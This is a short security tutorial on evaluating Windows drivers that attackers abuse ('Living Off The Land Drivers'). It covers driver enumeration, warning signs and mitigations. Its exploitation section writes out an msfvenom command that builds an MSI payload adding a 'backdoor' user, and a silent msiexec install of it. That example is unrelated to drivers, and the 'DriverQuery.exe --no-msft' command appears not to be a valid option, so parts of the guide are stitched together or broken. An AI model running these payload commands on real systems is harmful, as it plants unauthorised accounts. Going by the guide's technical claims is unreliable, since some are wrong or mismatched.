EoP - Evaluating Vulnerable Drivers

Evaluating Drivers and Mitigating Risks of Living Off The Land Drivers (LoLD)

Understanding Living Off The Land Drivers (LoLD)

"Living Off The Land Drivers" (LoLD) refers to legitimate drivers that adversaries exploit to perform malicious actions such as privilege escalation, evasion of security mechanisms, and payload execution. Since these drivers are considered trustworthy by the operating system, they can be used to bypass traditional security controls.

Regular evaluation of drivers is essential for identifying vulnerabilities and reducing the risk of exploitation.

---

Driver Enumeration

To assess the drivers running on a system, security professionals can utilize DriverQuery.exe, a native Windows tool that lists all loaded drivers and their properties.

Command to Enumerate Drivers

driverquery.exe /fo table /si

Sample Output

Module Name	Display Name	Driver Type	Link Date
1394ohci	1394 OHCI Compliant Host Driver	Kernel	12/10/2006 4:44:38 PM
3ware	3ware Kernel	Kernel	5/18/2015 6:28:03 PM
ACPI	Microsoft ACPI Driver	Kernel	12/9/1975 6:17:08 AM
AcpiDev	ACPI Devices Driver	Kernel	12/7/1993 6:22:19 AM

---

Analyzing Driver Properties

1. Module Name: Identifies the driver module.

2. Display Name: Provides a user-friendly name for the driver.

3. Driver Type: Indicates whether the driver operates in kernel or user mode.

4. Link Date: The compilation date, offering insights into the driver's age and potential exposure to vulnerabilities.

---

Identifying Non-Microsoft Drivers

Drivers not provided by Microsoft may introduce additional risks. To list third-party drivers:

DriverQuery.exe --no-msft

Sample Output

Service Name	Path	Version	Cert Issuer	Signer
ctxusbm	C:\Windows\system32\DRIVERS\ctxusbm.sys	14.11.0.138	Symantec Class 3 SHA256 Code Signing CA	Citrix Systems, Inc.

Key Indicators of Vulnerability:

• Drivers with outdated compilation dates.

• Drivers from untrusted or lesser-known publishers.

• Drivers lacking valid digital signatures or verified by a reputable certificate authority.

---

Exploitation of Vulnerable Drivers

Once vulnerable drivers are identified, attackers can exploit them to achieve various malicious objectives.

Example: Creating a Malicious Payload

Step 1: Generate a Malicious MSI Package

msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi

This command generates an MSI package (evil.msi) that, when executed, creates a backdoor user.

Step 2: Install the Malicious MSI

msiexec /quiet /qn /i C:\evil.msi

This command installs the malicious package silently, without user interaction, potentially enabling privilege escalation or persistent backdoor creation.

---

Mitigation Strategies

1. Driver Evaluation and Whitelisting

   • Regularly review and validate all drivers.

   • Use application and driver whitelisting to prevent unverified or malicious drivers from loading.

2. Patch Management

   • Keep drivers up-to-date and apply patches for known vulnerabilities promptly.

   • Replace outdated drivers with newer, secure versions.

3. Digital Signature Verification

   • Ensure all drivers are digitally signed by a trusted certificate authority.

   • Block unsigned or improperly signed drivers.

4. Monitoring and Logging

   • Implement monitoring to track the installation and loading of drivers.

   • Regularly review logs to identify suspicious activity related to driver operations.

5. User Account Control (UAC) and Least Privilege

   • Enforce UAC policies to restrict administrative actions.

   • Apply the principle of least privilege to limit user and application permissions.

---

Conclusion

The evaluation and monitoring of drivers are critical to maintaining system security. By identifying and addressing vulnerabilities in LoLDs, organizations can mitigate the risks of privilege escalation and other attacks leveraging legitimate drivers.